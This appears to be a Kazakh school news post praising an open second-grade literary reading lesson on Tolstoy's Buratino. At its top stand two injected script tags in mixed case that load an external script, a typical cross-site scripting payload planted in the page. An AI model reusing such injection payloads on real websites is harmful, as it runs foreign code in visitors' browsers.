<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
27.11.2017
2 сыныпта әдебиеттік оқудан
сабақ
21 қараша күні 2 сыныпта әдебиеттік оқу бойынша ашық сабақ өтті. Сабақты 1 санатты бастауыш сынып мұғалімі Мұхамедалинов Арғын Төлешұлы . Негізгі сабақта оқушылар А.Толстойдың «Золотой ключик или Приключения Буратино » шығармасымен танысты. Сабақтың басында мақсаты жоспарланып, сабақта жұмыстың әр түрлері қолданылды: жекеше, топтық, жұппен жұмыс. Пәнаралық міндеттер жақсы жетістікке жетті. Оқушылар ұқыпты тыңдап, не үйренді, нені үйрену керек екендігін ажырата алады; ұжыммен және өз бетінше жұмыс жасауды; өзінің
жасаған және құрбысының әрекетін бағалай алады. Сабақ өте жақсы ұйымдастырылған. Сабақта оқу материалының көлемі дұрыс құрылған, уақытты ұтымды пайдалана білді. Сабақта мейірімділік атмосферасы қалыптасып, оқушылар өздерін еркін ұстады. Мұғалімнің сөйлеу қабілеті сауатты, түсінікті, нақты. Сабақтың әр кезеңі жақсы ұйымдастырылып, оқушылар мұғалімге мейіріммен белсенді жауап беріп, шығармашылық білімдерімен, танымдарын көрсете білді. Сабақ мақсатына жетті.
Бастауыш сынып мұғалімдерінің ӘБ жетекшісі С.Щербакова